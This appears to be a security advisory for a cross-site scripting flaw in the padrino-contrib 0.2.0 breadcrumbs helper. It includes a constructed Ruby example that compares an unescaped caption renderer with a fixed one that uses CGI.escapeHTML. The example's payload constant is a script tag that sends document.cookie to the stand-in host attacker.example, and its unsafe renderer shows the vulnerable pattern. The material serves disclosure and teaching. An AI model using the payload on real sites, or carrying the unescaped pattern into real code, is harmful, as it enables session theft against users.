padrino-contrib is vulnerable to cross-site scripting (XSS). The `caption` parameter of the `set_home` function in `breadcrumbs.rb` is not HTML-escaped before being rendered into the page, so an attacker who controls the caption can inject script that executes in the victim's browser, allowing them to steal session tokens or perform actions on behalf of the user.
Affected CPE:

Name | Operator | Version
---|---|---
padrino-contrib | eq | 0.2.0
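The vulnerability class described above, shown as an added example that is not padrino-contrib's own code: a constructed, minimal breadcrumbs helper whose home link is rendered once with the caption interpolated verbatim (the vulnerable pattern) and once with every caller-supplied value HTML-escaped (the fix). The `Breadcrumbs` class, the `render_home_*` helpers and the payload string are all assumptions made for this illustration.

```ruby
require "cgi"

# Constructed stand-in for a breadcrumbs helper (not padrino-contrib's code):
# it stores a home link whose caption is supplied by the caller.
class Breadcrumbs
  attr_reader :home

  def initialize
    @home = nil
  end

  # Records the home crumb; `caption` is untrusted if it can come from user input.
  def set_home(url, caption)
    @home = { url: url, caption: caption }
    self
  end
end

# Vulnerable rendering: the caption is interpolated into the HTML as-is, so
# any markup or script in it lands in the page unchanged.
def render_home_unsafe(crumbs)
  %(<a href="#{crumbs.home[:url]}">#{crumbs.home[:caption]}</a>)
end

# Hardened rendering: every attacker-influenced value is escaped before
# interpolation. CGI.escapeHTML encodes & < > " and ' so the browser treats
# the caption as text, never as markup.
def render_home_safe(crumbs)
  url = CGI.escapeHTML(crumbs.home[:url])
  caption = CGI.escapeHTML(crumbs.home[:caption])
  %(<a href="#{url}">#{caption}</a>)
end

# Constructed payload: a caption carrying a cookie-exfiltrating script.
PAYLOAD = %(Home<script>document.location='https://attacker.example/?c='+document.cookie</script>)

# Renders the same crumb both ways so the difference is visible side by side.
def demo
  crumbs = Breadcrumbs.new.set_home("/", PAYLOAD)
  { unsafe: render_home_unsafe(crumbs), safe: render_home_safe(crumbs) }
end

if __FILE__ == $PROGRAM_NAME
  out = demo
  puts "unsafe: #{out[:unsafe]}"
  puts "safe:   #{out[:safe]}"
end
```

The check a reviewer would apply to the real helper is the same one this example makes explicit: every value that reaches the rendered HTML, including the caption and the URL, must pass through an HTML escaper (or a template layer that escapes by default) on the way out, rather than relying on callers to sanitise on the way in.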